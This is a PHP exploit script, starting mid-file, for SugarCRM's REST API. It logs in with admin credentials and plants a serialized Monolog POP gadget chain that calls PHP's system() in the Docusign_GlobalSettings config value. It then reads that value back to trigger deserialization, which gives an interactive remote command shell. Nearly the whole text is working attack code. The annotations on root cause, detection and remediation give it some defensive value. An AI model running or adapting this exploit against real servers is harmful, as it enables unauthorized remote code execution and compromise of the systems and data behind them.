\n");

// Pulls in chain.php, which is not part of this view; presumably it declares
// the \Monolog\Handler\* classes instantiated below — TODO confirm.
include("chain.php");

/**
 * Serializes an object graph that carries $cmd and writes it, base64-encoded,
 * into the target's Docusign_GlobalSettings configuration value.
 *
 * The graph is built from two classes in the \Monolog\Handler namespace and
 * names PHP's `system` function next to $cmd; how those objects behave when
 * they are deserialized depends on chain.php and on the server's own classes,
 * neither of which is visible here.
 *
 * Uses the shared cURL handle and base URL through `global`, so it depends on
 * the login code below having installed the OAuth-Token header first.
 *
 * Defender notes:
 *  - Root cause (presumed from this client side): the application passes an
 *    admin-writable setting to native unserialize(). Remediation is the
 *    vendor patch plus storing such settings as JSON, or calling
 *    unserialize() with `allowed_classes => false`.
 *  - Detection: a write to .../Administration/config/Docusign whose
 *    Docusign_GlobalSettings field base64-decodes to a PHP serialized object
 *    (`O:<len>:"Class"...`) is not a legitimate settings value.
 *
 * @param string $cmd Line read from STDIN by the interactive loop below.
 * @return void The HTTP response of the config write is discarded.
 */
function inject_pop_chain($cmd) {
    global $ch, $url;

    // Inner object: holds the ["current", "system"] pair and the command.
    $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]);
    // Outer object wrapping the inner one.
    $pop = new \Monolog\Handler\SyslogUdpHandler($pop);
    // base64 keeps the serialized bytes intact inside the JSON string below.
    $pop = base64_encode(serialize($pop));

    // Authenticated write to the administration config endpoint.
    curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");
    // JSON body is assembled by string concatenation; base64 output contains
    // no characters that would need JSON escaping.
    curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}');
    curl_exec($ch);
}

// Positional CLI arguments: base URL, username, password. $url is joined
// directly with "rest/...", so it has to end with a slash.
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

// NOTE(review): the password is echoed in clear text and ends up in terminal
// scrollback and any captured session log.
print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

// OAuth2 password grant with client_id "sugar". The request needs valid
// credentials; the config endpoint used later sits under "Administration",
// so the account presumably needs admin rights — TODO confirm.
$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
// Return response bodies from curl_exec() instead of printing them.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate verification is switched off for every request on this handle,
// so the credentials and the token are sent without authenticating the peer.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Loose comparison: a missing access_token property aborts the run.
if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");

// All later requests carry the session token in the OAuth-Token header.
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);

print "[+] Launching shell\n";

// Interactive loop. Each entered line produces two requests: the config write
// in inject_pop_chain(), then a read of .../DocuSign/getGlobalConfig whose
// response body is printed. Presumably the server deserializes the stored
// value while serving that read — TODO confirm against the server code.
// Defender note: this write-then-read pair, repeated from one client with the
// same token, is a recognisable sequence in API access logs.
while(1) {
    print "\nsugar-shell# ";
    // "exit" leaves the loop and falls through to the cleanup below.
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    inject_pop_chain($cmd);
    curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig");
    // Turn POST off again for the read request.
    curl_setopt($ch, CURLOPT_POST, false);
    // /(.+)/s matches any non-empty body, so the failure branch is reached
    // only when the response is empty or curl_exec() fails. die() exits
    // before the cleanup below, leaving the stored value in place.
    preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
}

// cleaning
// Resets Docusign_GlobalSettings to an empty string. Incident-response note:
// this runs only after a normal "exit"; after an aborted run the serialized
// value remains in the application's configuration and can be recovered there.
curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");
curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');
curl_exec($ch);